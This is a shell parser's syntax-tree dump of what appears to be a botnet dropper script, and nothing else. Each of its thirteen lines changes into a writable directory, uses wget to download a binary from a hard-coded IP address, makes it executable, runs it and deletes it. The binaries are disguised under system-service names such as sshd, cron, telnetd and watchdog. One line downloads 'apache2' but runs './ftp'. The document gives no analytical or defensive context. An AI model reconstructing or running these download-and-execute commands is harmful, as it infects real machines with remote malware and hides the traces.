ListNode(lineno=3, pos=(13, 134), parts=[
  CommandNode(lineno=3, pos=(13, 20), parts=[
    WordNode(lineno=3, pos=(13, 15), word='cd'),
    WordNode(lineno=3, pos=(16, 20), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(21, 23)),
  CommandNode(lineno=3, pos=(24, 35), parts=[
    WordNode(lineno=3, pos=(24, 26), word='cd'),
    WordNode(lineno=3, pos=(27, 35), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(36, 38)),
  CommandNode(lineno=3, pos=(39, 46), parts=[
    WordNode(lineno=3, pos=(39, 41), word='cd'),
    WordNode(lineno=3, pos=(42, 46), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(47, 49)),
  CommandNode(lineno=3, pos=(50, 58), parts=[
    WordNode(lineno=3, pos=(50, 52), word='cd'),
    WordNode(lineno=3, pos=(53, 58), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(59, 61)),
  CommandNode(lineno=3, pos=(62, 66), parts=[
    WordNode(lineno=3, pos=(62, 64), word='cd'),
    WordNode(lineno=3, pos=(65, 66), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(66, 67)),
  CommandNode(lineno=3, pos=(68, 98), parts=[
    WordNode(lineno=3, pos=(68, 72), word='wget'),
    WordNode(lineno=3, pos=(73, 98), word='http://45.76.167.153/ntpd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(98, 99)),
  CommandNode(lineno=3, pos=(100, 113), parts=[
    WordNode(lineno=3, pos=(100, 105), word='chmod'),
    WordNode(lineno=3, pos=(106, 108), word='+x'),
    WordNode(lineno=3, pos=(109, 113), word='ntpd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(113, 114)),
  CommandNode(lineno=3, pos=(115, 121), parts=[
    WordNode(lineno=3, pos=(115, 121), word='./ntpd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(121, 122)),
  CommandNode(lineno=3, pos=(123, 134), parts=[
    WordNode(lineno=3, pos=(123, 125), word='rm'),
    WordNode(lineno=3, pos=(126, 129), word='-rf'),
    WordNode(lineno=3, pos=(130, 134), word='ntpd'),
  ]),
])
ListNode(lineno=4, pos=(135, 256), parts=[
  CommandNode(lineno=4, pos=(135, 142), parts=[
    WordNode(lineno=4, pos=(135, 137), word='cd'),
    WordNode(lineno=4, pos=(138, 142), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(143, 145)),
  CommandNode(lineno=4, pos=(146, 157), parts=[
    WordNode(lineno=4, pos=(146, 148), word='cd'),
    WordNode(lineno=4, pos=(149, 157), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(158, 160)),
  CommandNode(lineno=4, pos=(161, 168), parts=[
    WordNode(lineno=4, pos=(161, 163), word='cd'),
    WordNode(lineno=4, pos=(164, 168), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(169, 171)),
  CommandNode(lineno=4, pos=(172, 180), parts=[
    WordNode(lineno=4, pos=(172, 174), word='cd'),
    WordNode(lineno=4, pos=(175, 180), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(181, 183)),
  CommandNode(lineno=4, pos=(184, 188), parts=[
    WordNode(lineno=4, pos=(184, 186), word='cd'),
    WordNode(lineno=4, pos=(187, 188), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(188, 189)),
  CommandNode(lineno=4, pos=(190, 220), parts=[
    WordNode(lineno=4, pos=(190, 194), word='wget'),
    WordNode(lineno=4, pos=(195, 220), word='http://45.76.167.153/sshd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(220, 221)),
  CommandNode(lineno=4, pos=(222, 235), parts=[
    WordNode(lineno=4, pos=(222, 227), word='chmod'),
    WordNode(lineno=4, pos=(228, 230), word='+x'),
    WordNode(lineno=4, pos=(231, 235), word='sshd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(235, 236)),
  CommandNode(lineno=4, pos=(237, 243), parts=[
    WordNode(lineno=4, pos=(237, 243), word='./sshd'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(243, 244)),
  CommandNode(lineno=4, pos=(245, 256), parts=[
    WordNode(lineno=4, pos=(245, 247), word='rm'),
    WordNode(lineno=4, pos=(248, 251), word='-rf'),
    WordNode(lineno=4, pos=(252, 256), word='sshd'),
  ]),
])
ListNode(lineno=5, pos=(257, 370), parts=[
  CommandNode(lineno=5, pos=(257, 264), parts=[
    WordNode(lineno=5, pos=(257, 259), word='cd'),
    WordNode(lineno=5, pos=(260, 264), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(265, 267)),
  CommandNode(lineno=5, pos=(268, 279), parts=[
    WordNode(lineno=5, pos=(268, 270), word='cd'),
    WordNode(lineno=5, pos=(271, 279), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(280, 282)),
  CommandNode(lineno=5, pos=(283, 290), parts=[
    WordNode(lineno=5, pos=(283, 285), word='cd'),
    WordNode(lineno=5, pos=(286, 290), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(291, 293)),
  CommandNode(lineno=5, pos=(294, 302), parts=[
    WordNode(lineno=5, pos=(294, 296), word='cd'),
    WordNode(lineno=5, pos=(297, 302), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(303, 305)),
  CommandNode(lineno=5, pos=(306, 310), parts=[
    WordNode(lineno=5, pos=(306, 308), word='cd'),
    WordNode(lineno=5, pos=(309, 310), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(310, 311)),
  CommandNode(lineno=5, pos=(312, 340), parts=[
    WordNode(lineno=5, pos=(312, 316), word='wget'),
    WordNode(lineno=5, pos=(317, 340), word='http://45.76.167.153/sh'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(340, 341)),
  CommandNode(lineno=5, pos=(342, 353), parts=[
    WordNode(lineno=5, pos=(342, 347), word='chmod'),
    WordNode(lineno=5, pos=(348, 350), word='+x'),
    WordNode(lineno=5, pos=(351, 353), word='sh'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(353, 354)),
  CommandNode(lineno=5, pos=(355, 359), parts=[
    WordNode(lineno=5, pos=(355, 359), word='./sh'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(359, 360)),
  CommandNode(lineno=5, pos=(361, 370), parts=[
    WordNode(lineno=5, pos=(361, 363), word='rm'),
    WordNode(lineno=5, pos=(364, 367), word='-rf'),
    WordNode(lineno=5, pos=(368, 370), word='sh'),
  ]),
])
ListNode(lineno=6, pos=(371, 492), parts=[
  CommandNode(lineno=6, pos=(371, 378), parts=[
    WordNode(lineno=6, pos=(371, 373), word='cd'),
    WordNode(lineno=6, pos=(374, 378), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(379, 381)),
  CommandNode(lineno=6, pos=(382, 393), parts=[
    WordNode(lineno=6, pos=(382, 384), word='cd'),
    WordNode(lineno=6, pos=(385, 393), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(394, 396)),
  CommandNode(lineno=6, pos=(397, 404), parts=[
    WordNode(lineno=6, pos=(397, 399), word='cd'),
    WordNode(lineno=6, pos=(400, 404), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(405, 407)),
  CommandNode(lineno=6, pos=(408, 416), parts=[
    WordNode(lineno=6, pos=(408, 410), word='cd'),
    WordNode(lineno=6, pos=(411, 416), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(417, 419)),
  CommandNode(lineno=6, pos=(420, 424), parts=[
    WordNode(lineno=6, pos=(420, 422), word='cd'),
    WordNode(lineno=6, pos=(423, 424), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(424, 425)),
  CommandNode(lineno=6, pos=(426, 456), parts=[
    WordNode(lineno=6, pos=(426, 430), word='wget'),
    WordNode(lineno=6, pos=(431, 456), word='http://45.76.167.153/bash'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(456, 457)),
  CommandNode(lineno=6, pos=(458, 471), parts=[
    WordNode(lineno=6, pos=(458, 463), word='chmod'),
    WordNode(lineno=6, pos=(464, 466), word='+x'),
    WordNode(lineno=6, pos=(467, 471), word='bash'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(471, 472)),
  CommandNode(lineno=6, pos=(473, 479), parts=[
    WordNode(lineno=6, pos=(473, 479), word='./bash'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(479, 480)),
  CommandNode(lineno=6, pos=(481, 492), parts=[
    WordNode(lineno=6, pos=(481, 483), word='rm'),
    WordNode(lineno=6, pos=(484, 487), word='-rf'),
    WordNode(lineno=6, pos=(488, 492), word='bash'),
  ]),
])
ListNode(lineno=7, pos=(493, 626), parts=[
  CommandNode(lineno=7, pos=(493, 500), parts=[
    WordNode(lineno=7, pos=(493, 495), word='cd'),
    WordNode(lineno=7, pos=(496, 500), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(501, 503)),
  CommandNode(lineno=7, pos=(504, 515), parts=[
    WordNode(lineno=7, pos=(504, 506), word='cd'),
    WordNode(lineno=7, pos=(507, 515), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(516, 518)),
  CommandNode(lineno=7, pos=(519, 526), parts=[
    WordNode(lineno=7, pos=(519, 521), word='cd'),
    WordNode(lineno=7, pos=(522, 526), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(527, 529)),
  CommandNode(lineno=7, pos=(530, 538), parts=[
    WordNode(lineno=7, pos=(530, 532), word='cd'),
    WordNode(lineno=7, pos=(533, 538), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(539, 541)),
  CommandNode(lineno=7, pos=(542, 546), parts=[
    WordNode(lineno=7, pos=(542, 544), word='cd'),
    WordNode(lineno=7, pos=(545, 546), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(546, 547)),
  CommandNode(lineno=7, pos=(548, 581), parts=[
    WordNode(lineno=7, pos=(548, 552), word='wget'),
    WordNode(lineno=7, pos=(553, 581), word='http://45.76.167.153/openssh'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(581, 582)),
  CommandNode(lineno=7, pos=(583, 599), parts=[
    WordNode(lineno=7, pos=(583, 588), word='chmod'),
    WordNode(lineno=7, pos=(589, 591), word='+x'),
    WordNode(lineno=7, pos=(592, 599), word='openssh'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(599, 600)),
  CommandNode(lineno=7, pos=(601, 610), parts=[
    WordNode(lineno=7, pos=(601, 610), word='./openssh'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(610, 611)),
  CommandNode(lineno=7, pos=(612, 626), parts=[
    WordNode(lineno=7, pos=(612, 614), word='rm'),
    WordNode(lineno=7, pos=(615, 618), word='-rf'),
    WordNode(lineno=7, pos=(619, 626), word='openssh'),
  ]),
])
ListNode(lineno=8, pos=(627, 748), parts=[
  CommandNode(lineno=8, pos=(627, 634), parts=[
    WordNode(lineno=8, pos=(627, 629), word='cd'),
    WordNode(lineno=8, pos=(630, 634), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(635, 637)),
  CommandNode(lineno=8, pos=(638, 649), parts=[
    WordNode(lineno=8, pos=(638, 640), word='cd'),
    WordNode(lineno=8, pos=(641, 649), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(650, 652)),
  CommandNode(lineno=8, pos=(653, 660), parts=[
    WordNode(lineno=8, pos=(653, 655), word='cd'),
    WordNode(lineno=8, pos=(656, 660), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(661, 663)),
  CommandNode(lineno=8, pos=(664, 672), parts=[
    WordNode(lineno=8, pos=(664, 666), word='cd'),
    WordNode(lineno=8, pos=(667, 672), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(673, 675)),
  CommandNode(lineno=8, pos=(676, 680), parts=[
    WordNode(lineno=8, pos=(676, 678), word='cd'),
    WordNode(lineno=8, pos=(679, 680), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(680, 681)),
  CommandNode(lineno=8, pos=(682, 712), parts=[
    WordNode(lineno=8, pos=(682, 686), word='wget'),
    WordNode(lineno=8, pos=(687, 712), word='http://45.76.167.153/wget'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(712, 713)),
  CommandNode(lineno=8, pos=(714, 727), parts=[
    WordNode(lineno=8, pos=(714, 719), word='chmod'),
    WordNode(lineno=8, pos=(720, 722), word='+x'),
    WordNode(lineno=8, pos=(723, 727), word='wget'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(727, 728)),
  CommandNode(lineno=8, pos=(729, 735), parts=[
    WordNode(lineno=8, pos=(729, 735), word='./wget'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(735, 736)),
  CommandNode(lineno=8, pos=(737, 748), parts=[
    WordNode(lineno=8, pos=(737, 739), word='rm'),
    WordNode(lineno=8, pos=(740, 743), word='-rf'),
    WordNode(lineno=8, pos=(744, 748), word='wget'),
  ]),
])
ListNode(lineno=9, pos=(749, 870), parts=[
  CommandNode(lineno=9, pos=(749, 756), parts=[
    WordNode(lineno=9, pos=(749, 751), word='cd'),
    WordNode(lineno=9, pos=(752, 756), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(757, 759)),
  CommandNode(lineno=9, pos=(760, 771), parts=[
    WordNode(lineno=9, pos=(760, 762), word='cd'),
    WordNode(lineno=9, pos=(763, 771), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(772, 774)),
  CommandNode(lineno=9, pos=(775, 782), parts=[
    WordNode(lineno=9, pos=(775, 777), word='cd'),
    WordNode(lineno=9, pos=(778, 782), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(783, 785)),
  CommandNode(lineno=9, pos=(786, 794), parts=[
    WordNode(lineno=9, pos=(786, 788), word='cd'),
    WordNode(lineno=9, pos=(789, 794), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(795, 797)),
  CommandNode(lineno=9, pos=(798, 802), parts=[
    WordNode(lineno=9, pos=(798, 800), word='cd'),
    WordNode(lineno=9, pos=(801, 802), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(802, 803)),
  CommandNode(lineno=9, pos=(804, 834), parts=[
    WordNode(lineno=9, pos=(804, 808), word='wget'),
    WordNode(lineno=9, pos=(809, 834), word='http://45.76.167.153/tftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(834, 835)),
  CommandNode(lineno=9, pos=(836, 849), parts=[
    WordNode(lineno=9, pos=(836, 841), word='chmod'),
    WordNode(lineno=9, pos=(842, 844), word='+x'),
    WordNode(lineno=9, pos=(845, 849), word='tftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(849, 850)),
  CommandNode(lineno=9, pos=(851, 857), parts=[
    WordNode(lineno=9, pos=(851, 857), word='./tftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(857, 858)),
  CommandNode(lineno=9, pos=(859, 870), parts=[
    WordNode(lineno=9, pos=(859, 861), word='rm'),
    WordNode(lineno=9, pos=(862, 865), word='-rf'),
    WordNode(lineno=9, pos=(866, 870), word='tftp'),
  ]),
])
ListNode(lineno=10, pos=(871, 992), parts=[
  CommandNode(lineno=10, pos=(871, 878), parts=[
    WordNode(lineno=10, pos=(871, 873), word='cd'),
    WordNode(lineno=10, pos=(874, 878), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(879, 881)),
  CommandNode(lineno=10, pos=(882, 893), parts=[
    WordNode(lineno=10, pos=(882, 884), word='cd'),
    WordNode(lineno=10, pos=(885, 893), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(894, 896)),
  CommandNode(lineno=10, pos=(897, 904), parts=[
    WordNode(lineno=10, pos=(897, 899), word='cd'),
    WordNode(lineno=10, pos=(900, 904), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(905, 907)),
  CommandNode(lineno=10, pos=(908, 916), parts=[
    WordNode(lineno=10, pos=(908, 910), word='cd'),
    WordNode(lineno=10, pos=(911, 916), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(917, 919)),
  CommandNode(lineno=10, pos=(920, 924), parts=[
    WordNode(lineno=10, pos=(920, 922), word='cd'),
    WordNode(lineno=10, pos=(923, 924), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(924, 925)),
  CommandNode(lineno=10, pos=(926, 956), parts=[
    WordNode(lineno=10, pos=(926, 930), word='wget'),
    WordNode(lineno=10, pos=(931, 956), word='http://45.76.167.153/cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(956, 957)),
  CommandNode(lineno=10, pos=(958, 971), parts=[
    WordNode(lineno=10, pos=(958, 963), word='chmod'),
    WordNode(lineno=10, pos=(964, 966), word='+x'),
    WordNode(lineno=10, pos=(967, 971), word='cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(971, 972)),
  CommandNode(lineno=10, pos=(973, 979), parts=[
    WordNode(lineno=10, pos=(973, 979), word='./cron'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(979, 980)),
  CommandNode(lineno=10, pos=(981, 992), parts=[
    WordNode(lineno=10, pos=(981, 983), word='rm'),
    WordNode(lineno=10, pos=(984, 987), word='-rf'),
    WordNode(lineno=10, pos=(988, 992), word='cron'),
  ]),
])
ListNode(lineno=11, pos=(993, 1114), parts=[
  CommandNode(lineno=11, pos=(993, 1000), parts=[
    WordNode(lineno=11, pos=(993, 995), word='cd'),
    WordNode(lineno=11, pos=(996, 1000), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1001, 1003)),
  CommandNode(lineno=11, pos=(1004, 1015), parts=[
    WordNode(lineno=11, pos=(1004, 1006), word='cd'),
    WordNode(lineno=11, pos=(1007, 1015), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1016, 1018)),
  CommandNode(lineno=11, pos=(1019, 1026), parts=[
    WordNode(lineno=11, pos=(1019, 1021), word='cd'),
    WordNode(lineno=11, pos=(1022, 1026), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1027, 1029)),
  CommandNode(lineno=11, pos=(1030, 1038), parts=[
    WordNode(lineno=11, pos=(1030, 1032), word='cd'),
    WordNode(lineno=11, pos=(1033, 1038), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1039, 1041)),
  CommandNode(lineno=11, pos=(1042, 1046), parts=[
    WordNode(lineno=11, pos=(1042, 1044), word='cd'),
    WordNode(lineno=11, pos=(1045, 1046), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1046, 1047)),
  CommandNode(lineno=11, pos=(1048, 1078), parts=[
    WordNode(lineno=11, pos=(1048, 1052), word='wget'),
    WordNode(lineno=11, pos=(1053, 1078), word='http://45.76.167.153/pftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1078, 1079)),
  CommandNode(lineno=11, pos=(1080, 1093), parts=[
    WordNode(lineno=11, pos=(1080, 1085), word='chmod'),
    WordNode(lineno=11, pos=(1086, 1088), word='+x'),
    WordNode(lineno=11, pos=(1089, 1093), word='pftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1093, 1094)),
  CommandNode(lineno=11, pos=(1095, 1101), parts=[
    WordNode(lineno=11, pos=(1095, 1101), word='./pftp'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1101, 1102)),
  CommandNode(lineno=11, pos=(1103, 1114), parts=[
    WordNode(lineno=11, pos=(1103, 1105), word='rm'),
    WordNode(lineno=11, pos=(1106, 1109), word='-rf'),
    WordNode(lineno=11, pos=(1110, 1114), word='pftp'),
  ]),
])
ListNode(lineno=12, pos=(1115, 1232), parts=[
  CommandNode(lineno=12, pos=(1115, 1122), parts=[
    WordNode(lineno=12, pos=(1115, 1117), word='cd'),
    WordNode(lineno=12, pos=(1118, 1122), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1123, 1125)),
  CommandNode(lineno=12, pos=(1126, 1137), parts=[
    WordNode(lineno=12, pos=(1126, 1128), word='cd'),
    WordNode(lineno=12, pos=(1129, 1137), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1138, 1140)),
  CommandNode(lineno=12, pos=(1141, 1148), parts=[
    WordNode(lineno=12, pos=(1141, 1143), word='cd'),
    WordNode(lineno=12, pos=(1144, 1148), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1149, 1151)),
  CommandNode(lineno=12, pos=(1152, 1160), parts=[
    WordNode(lineno=12, pos=(1152, 1154), word='cd'),
    WordNode(lineno=12, pos=(1155, 1160), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1161, 1163)),
  CommandNode(lineno=12, pos=(1164, 1168), parts=[
    WordNode(lineno=12, pos=(1164, 1166), word='cd'),
    WordNode(lineno=12, pos=(1167, 1168), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1168, 1169)),
  CommandNode(lineno=12, pos=(1170, 1199), parts=[
    WordNode(lineno=12, pos=(1170, 1174), word='wget'),
    WordNode(lineno=12, pos=(1175, 1199), word='http://45.76.167.153/ftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1199, 1200)),
  CommandNode(lineno=12, pos=(1201, 1213), parts=[
    WordNode(lineno=12, pos=(1201, 1206), word='chmod'),
    WordNode(lineno=12, pos=(1207, 1209), word='+x'),
    WordNode(lineno=12, pos=(1210, 1213), word='ftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1213, 1214)),
  CommandNode(lineno=12, pos=(1215, 1220), parts=[
    WordNode(lineno=12, pos=(1215, 1220), word='./ftp'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1220, 1221)),
  CommandNode(lineno=12, pos=(1222, 1232), parts=[
    WordNode(lineno=12, pos=(1222, 1224), word='rm'),
    WordNode(lineno=12, pos=(1225, 1228), word='-rf'),
    WordNode(lineno=12, pos=(1229, 1232), word='ftp'),
  ]),
])
ListNode(lineno=13, pos=(1233, 1366), parts=[
  CommandNode(lineno=13, pos=(1233, 1240), parts=[
    WordNode(lineno=13, pos=(1233, 1235), word='cd'),
    WordNode(lineno=13, pos=(1236, 1240), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1241, 1243)),
  CommandNode(lineno=13, pos=(1244, 1255), parts=[
    WordNode(lineno=13, pos=(1244, 1246), word='cd'),
    WordNode(lineno=13, pos=(1247, 1255), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1256, 1258)),
  CommandNode(lineno=13, pos=(1259, 1266), parts=[
    WordNode(lineno=13, pos=(1259, 1261), word='cd'),
    WordNode(lineno=13, pos=(1262, 1266), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1267, 1269)),
  CommandNode(lineno=13, pos=(1270, 1278), parts=[
    WordNode(lineno=13, pos=(1270, 1272), word='cd'),
    WordNode(lineno=13, pos=(1273, 1278), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1279, 1281)),
  CommandNode(lineno=13, pos=(1282, 1286), parts=[
    WordNode(lineno=13, pos=(1282, 1284), word='cd'),
    WordNode(lineno=13, pos=(1285, 1286), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1286, 1287)),
  CommandNode(lineno=13, pos=(1288, 1321), parts=[
    WordNode(lineno=13, pos=(1288, 1292), word='wget'),
    WordNode(lineno=13, pos=(1293, 1321), word='http://45.76.167.153/telnetd'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1321, 1322)),
  CommandNode(lineno=13, pos=(1323, 1339), parts=[
    WordNode(lineno=13, pos=(1323, 1328), word='chmod'),
    WordNode(lineno=13, pos=(1329, 1331), word='+x'),
    WordNode(lineno=13, pos=(1332, 1339), word='telnetd'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1339, 1340)),
  CommandNode(lineno=13, pos=(1341, 1350), parts=[
    WordNode(lineno=13, pos=(1341, 1350), word='./telnetd'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1350, 1351)),
  CommandNode(lineno=13, pos=(1352, 1366), parts=[
    WordNode(lineno=13, pos=(1352, 1354), word='rm'),
    WordNode(lineno=13, pos=(1355, 1358), word='-rf'),
    WordNode(lineno=13, pos=(1359, 1366), word='telnetd'),
  ]),
])
ListNode(lineno=14, pos=(1367, 1496), parts=[
  CommandNode(lineno=14, pos=(1367, 1374), parts=[
    WordNode(lineno=14, pos=(1367, 1369), word='cd'),
    WordNode(lineno=14, pos=(1370, 1374), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1375, 1377)),
  CommandNode(lineno=14, pos=(1378, 1389), parts=[
    WordNode(lineno=14, pos=(1378, 1380), word='cd'),
    WordNode(lineno=14, pos=(1381, 1389), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1390, 1392)),
  CommandNode(lineno=14, pos=(1393, 1400), parts=[
    WordNode(lineno=14, pos=(1393, 1395), word='cd'),
    WordNode(lineno=14, pos=(1396, 1400), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1401, 1403)),
  CommandNode(lineno=14, pos=(1404, 1412), parts=[
    WordNode(lineno=14, pos=(1404, 1406), word='cd'),
    WordNode(lineno=14, pos=(1407, 1412), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1413, 1415)),
  CommandNode(lineno=14, pos=(1416, 1420), parts=[
    WordNode(lineno=14, pos=(1416, 1418), word='cd'),
    WordNode(lineno=14, pos=(1419, 1420), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1420, 1421)),
  CommandNode(lineno=14, pos=(1422, 1455), parts=[
    WordNode(lineno=14, pos=(1422, 1426), word='wget'),
    WordNode(lineno=14, pos=(1427, 1455), word='http://45.76.167.153/apache2'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1455, 1456)),
  CommandNode(lineno=14, pos=(1457, 1473), parts=[
    WordNode(lineno=14, pos=(1457, 1462), word='chmod'),
    WordNode(lineno=14, pos=(1463, 1465), word='+x'),
    WordNode(lineno=14, pos=(1466, 1473), word='apache2'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1473, 1474)),
  CommandNode(lineno=14, pos=(1475, 1480), parts=[
    WordNode(lineno=14, pos=(1475, 1480), word='./ftp'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1480, 1481)),
  CommandNode(lineno=14, pos=(1482, 1496), parts=[
    WordNode(lineno=14, pos=(1482, 1484), word='rm'),
    WordNode(lineno=14, pos=(1485, 1488), word='-rf'),
    WordNode(lineno=14, pos=(1489, 1496), word='apache2'),
  ]),
])
ListNode(lineno=15, pos=(1497, 1634), parts=[
  CommandNode(lineno=15, pos=(1497, 1504), parts=[
    WordNode(lineno=15, pos=(1497, 1499), word='cd'),
    WordNode(lineno=15, pos=(1500, 1504), word='/tmp'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1505, 1507)),
  CommandNode(lineno=15, pos=(1508, 1519), parts=[
    WordNode(lineno=15, pos=(1508, 1510), word='cd'),
    WordNode(lineno=15, pos=(1511, 1519), word='/var/run'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1520, 1522)),
  CommandNode(lineno=15, pos=(1523, 1530), parts=[
    WordNode(lineno=15, pos=(1523, 1525), word='cd'),
    WordNode(lineno=15, pos=(1526, 1530), word='/mnt'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1531, 1533)),
  CommandNode(lineno=15, pos=(1534, 1542), parts=[
    WordNode(lineno=15, pos=(1534, 1536), word='cd'),
    WordNode(lineno=15, pos=(1537, 1542), word='/root'),
  ]),
  OperatorNode(lineno=15, op='||', pos=(1543, 1545)),
  CommandNode(lineno=15, pos=(1546, 1550), parts=[
    WordNode(lineno=15, pos=(1546, 1548), word='cd'),
    WordNode(lineno=15, pos=(1549, 1550), word='/'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1550, 1551)),
  CommandNode(lineno=15, pos=(1552, 1586), parts=[
    WordNode(lineno=15, pos=(1552, 1556), word='wget'),
    WordNode(lineno=15, pos=(1557, 1586), word='http://45.76.167.153/watchdog'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1586, 1587)),
  CommandNode(lineno=15, pos=(1588, 1605), parts=[
    WordNode(lineno=15, pos=(1588, 1593), word='chmod'),
    WordNode(lineno=15, pos=(1594, 1596), word='+x'),
    WordNode(lineno=15, pos=(1597, 1605), word='watchdog'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1605, 1606)),
  CommandNode(lineno=15, pos=(1607, 1617), parts=[
    WordNode(lineno=15, pos=(1607, 1617), word='./watchdog'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1617, 1618)),
  CommandNode(lineno=15, pos=(1619, 1634), parts=[
    WordNode(lineno=15, pos=(1619, 1621), word='rm'),
    WordNode(lineno=15, pos=(1622, 1625), word='-rf'),
    WordNode(lineno=15, pos=(1626, 1634), word='watchdog'),
  ]),
])
